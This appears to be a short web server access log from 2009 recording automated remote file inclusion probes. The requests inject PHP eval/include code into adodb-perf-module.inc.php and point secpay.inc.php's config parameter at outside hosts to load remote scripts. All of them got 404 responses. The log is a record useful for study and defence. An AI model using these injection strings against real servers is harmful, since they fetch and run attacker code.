211.115.89.97 - - [06/Oct/2009:03:37:22 -0400] "GET /logs/access_log.Q109092000//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.115.89.97 - - [06/Oct/2009:03:37:22 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.135.134.109 - - [06/Oct/2009:03:37:47 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:37:47 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:37:47 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinit